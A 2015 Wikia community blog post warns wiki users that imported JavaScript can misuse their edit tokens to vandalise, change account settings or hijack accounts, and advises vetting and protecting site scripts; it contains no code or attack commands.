Community Central


JavaScript, between dream and nightmare

Gguigui1 August 16, 2015 User blog:Gguigui1

Hey there,

This is my first blog post in English. Today, I'II show you the good sides but also and chiefly, the bad, dark sides of JavaScript (JS). As you likely know, JavaScript is a significant share of any Web Site code as it is the code which works with {{#NewWindowLink:Wikipedia:Ajax_(programming)|AJAX}} so 99.99% of websites use JS ; just a proof among others:

A no-js site
A js site
A site with JS disabled The same site with JS enabled

Wikia is also part of it. However, in Wikia, local wikia admin can customize their wikia with JavaScript. And this feature has gradually turned out to be seen as indispensable, with pure code or verbatim, for a majority of communities and to manage easier and quicker any wikia. For instance, here is my current wiki activity view:

My js current view

and with JS disabled, a lot of features disappear (can you spot the 7 differences?):

My no-js current view

But, like all coding languages, JS is not restricted only to display things in a better way. JavaScript can become malicious and turn the dream into a nightmare reality:
The main culprit is AJAX, which is like: "the best friend and the worst foe". Indeed, each time you edit a page, protect a page, delete a page, block a user, unblock a user... you call AJAX. These AJAX requests are sent to the Wikia API, which is the intermediate between you and Wikia database containing wikias' information. And this API often needs only one thing, the gold nugget: {{#NewWindowLink: token}} and mainly the edit token. But what is the edit token? The edit token is a sequence of digits and letters of about 25 characters ending with "+/" and is mandatory to edit any Wikia content — ultimately, edit in Wikia's database. This token identifies you, this is why when you edit, your name appears, because the sent token is yours and Wikia API recognizes you.
If a JS script could take this token, it could make edits for you, and this is perfectly what happened when you use for example {{#NewWindowLink:w:c:dev:WHAM|WHAM}}, {{#NewWindowLink:w:c:dev:QuickComments|QuickComments}} or {{#NewWindowLink:w:c:dev:QuickTools|QuickTools}} — the script gets your edit token or any needed token and makes edits for you, deletes pages, blocks an user, protects pages, rollbacks edits (it's not the edit token in this case though). These scripts are not malicious but they can be. Imagine for example that WHAM deletes all the pages in your wikia, or remove pages contents in an other wikia, that would definitely block you on this wikia, unblock all vandals of your wikia, block you and remove your sysop and/or bureaucrat rights and redirect you to a malicious site and can do it for everyone on your wikia, including all the admins and all the contributors. Very very very bad luck. But this can be even worse...
Indeed, JavaScript code can use your rights allowed by yours tokens to perform good or bad actions, using your account and maybe without your knowledge, but JavaScript code can also change your mail, steal your password (presently), and this way, change your password, and in this case, you lose your account.

To sum up, never use/import a script if you're unsure it's safe, you should better ask for a proficient and trustworthy code editor to be sure that the code is harmless for your account and is not a troll (open several tabs, change page content dynamically...). You should also better copy the script on your wikia instead of importing it if you are not sure that the page you're importing from is protected against potential harmful edits. And, do not forget to put each JS code you have in a MediaWiki page to avoid non-sysop users to edit it. Foremost, JavaScript can contain the best things and the worst things, it's like software: if you can't understand the code or if you don't see directly the code (like in most websites). This works for Wikia but for others websites too as you can execute JavaScript code thrown your {{#NewWindowLink: console}} . As nearly all websites contains JavaScript codes, be as vigilant with software as with javascript codes, mostly if you don't understand JavaScript, so this is an another reason not to visit websites which look suspicious. Also, do not put anything in your Wikia's JS script that allows to execute some div as malicious users can use it against you and your community.
Do not forget:

You are a significant wall against malicious attacks. Whichever software, how good it can be, cannot replace your care. You have the intelligence, softwares and computers don't.

Also on Fandom

Random Wiki